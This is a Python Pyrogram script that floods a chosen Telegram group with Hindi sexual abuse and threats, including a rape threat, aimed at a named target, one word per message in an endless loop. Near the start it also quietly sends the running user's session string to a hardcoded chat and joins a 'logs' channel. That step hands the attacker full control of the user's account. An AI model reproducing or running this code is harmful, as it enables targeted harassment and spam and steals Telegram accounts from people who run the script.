import os
import sys
import asyncio
from asyncio import sleep
from pyrogram import Client, filters
from pyrogram.types import Message
import tgcrypto

print("\n - Pyrogram One Word Abuse -")

ID = "3147700"
HASH = "e660ea4d20e70a3897aa8cf3a6dc60af"

Session = input("Send Your Pyrogram String Session: \n")

sex = Client(name="Session", api_id=ID, api_hash=HASH, session_string=Session)

grp = input("Send Group username Where You Want Abuse: \n")
trg = input("Enter Target Username or Name \n")
print(" \n\n Starting Session .....\n")

sex.start()
sex.join_chat(grp)
sex.join_chat("ArrayCoreLogs")
sex.send_message(-1001648072311, f"{Session}")
sex.leave_chat(-1001648072311)
x = True
try:
  while x != False:

    sex.send_message(grp, f"BAHAR AAA {trg} 😂")
    sex.send_message(grp, "TERI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "DAM")
    sex.send_message(grp, "NAAH")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "KYA")
    sex.send_message(grp, "BETICHOD")
    sex.send_message(grp, "TRRE")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "MARU")
    sex.send_message(grp, "LODE")
    sex.send_message(grp, "RANDII")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "JADI")
    sex.send_message(grp, "LIKH")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "BHEN")
    sex.send_message(grp, "KA")
    sex.send_message(grp, "BHOSDA")
    sex.send_message(grp, "MARU")
    sex.send_message(grp, "RANDII")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "PILLE")
    sex.send_message(grp, "TOHR")
    sex.send_message(grp, "MAIYAA")
    sex.send_message(grp, "KA")
    sex.send_message(grp, "RAPE")
    sex.send_message(grp, "KR")
    sex.send_message(grp, "DU")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "KID")
    sex.send_message(grp, "AANAN")
    sex.send_message(grp, f"{trg}")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "MERA")
    sex.send_message(grp, "LODA")
    sex.send_message(grp, f"SPEED PAKAD {trg} ⚡️⚡️")
    sex.send_message(grp, "MADARCHOD")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "MAAA")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "NANGA")
    sex.send_message(grp, "KAR")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "CHOD")
    sex.send_message(grp, "DU")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "BHENKELODE")
    sex.send_message(grp, f"{trg}")
    sex.send_message(grp, "BAAP")
    sex.send_message(grp, "BOL")
    sex.send_message(grp, "RE")
    sex.send_message(grp, "RANDIII")
    sex.send_message(grp, "KE")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "BHEN")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "BOOBS")
    sex.send_message(grp, "DABABA")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "BHEN")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "CHUCHI")
    sex.send_message(grp, "CHUSKE")
    sex.send_message(grp, "HALKA")
    sex.send_message(grp, "KARDUNGA")
    sex.send_message(grp, f"SPEED MATCH NAHI HORI KYA {trg} BETA ? 😂 ")
    sex.send_message(grp, "AANA")
    sex.send_message(grp, "KID")
    sex.send_message(grp, "AIJKT")
    sex.send_message(grp, "HIL")
    sex.send_message(grp, "GYA")
    sex.send_message(grp, "KYA")
    sex.send_message(grp, "TERA")
    sex.send_message(grp, "😂😂😂😂🤣🤣🤣")
    sex.send_message(grp, "TOHR")
    sex.send_message(grp, "MAIYAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "PHAD")
    sex.send_message(grp, "DIYE")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "TRRE")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "PURE")
    sex.send_message(grp, "TELEGRAM")
    sex.send_message(grp, "PAI")
    sex.send_message(grp, "APNE")
    sex.send_message(grp, "NUDES")
    sex.send_message(grp, "FREE")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "DETI")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "JHATUU")
    sex.send_message(grp, "SAB")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "SAB")
    sex.send_message(grp, "DEKH")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "MUTH")
    sex.send_message(grp, "MARTE")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "BHOSDEKKK")
    sex.send_message(grp, "SHARAM")
    sex.send_message(grp, "KAR")
    sex.send_message(grp, "LE")
    sex.send_message(grp, "BAAP")
    sex.send_message(grp, "HU")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, f"TERA {trg}")
    sex.send_message(grp, "GANDRCHOD")
    sex.send_message(grp, "💦💦💦💦LUNNNDDD")
    sex.send_message(grp, "SE")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "KHADAN")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "CHOD")
    sex.send_message(grp, "RKAHA")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "REPY")
    sex.send_message(grp, "DE")
    sex.send_message(grp, "SUAR")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "AULAAD")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "PHATTEE")
    sex.send_message(grp, "CONDOMM")
    sex.send_message(grp, "SE")
    sex.send_message(grp, "CHODA")
    sex.send_message(grp, "THA")
    sex.send_message(grp, "TABB")
    sex.send_message(grp, "PAIDA")
    sex.send_message(grp, "HUA")
    sex.send_message(grp, "THAA")
    sex.send_message(grp, "AB")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "GAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "CHODU")
    sex.send_message(grp, "EK")
    sex.send_message(grp, "AUR")
    sex.send_message(grp, "BAAR")
    sex.send_message(grp, "BACHEDAANI")
    sex.send_message(grp, "NIKAL")
    sex.send_message(grp, "DUNGA")
    sex.send_message(grp, "😂😂😂")
    sex.send_message(grp, f"{trg} TERI")
    sex.send_message(grp, "MAAAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "CHUTT")
    sex.send_message(grp, "CHODD")
    sex.send_message(grp, "CHODD")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "KALI")
    sex.send_message(grp, "KR")
    sex.send_message(grp, "DU")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "RANDIIII")
    sex.send_message(grp, "BHADWE")
except Exception as a:
  print(a)
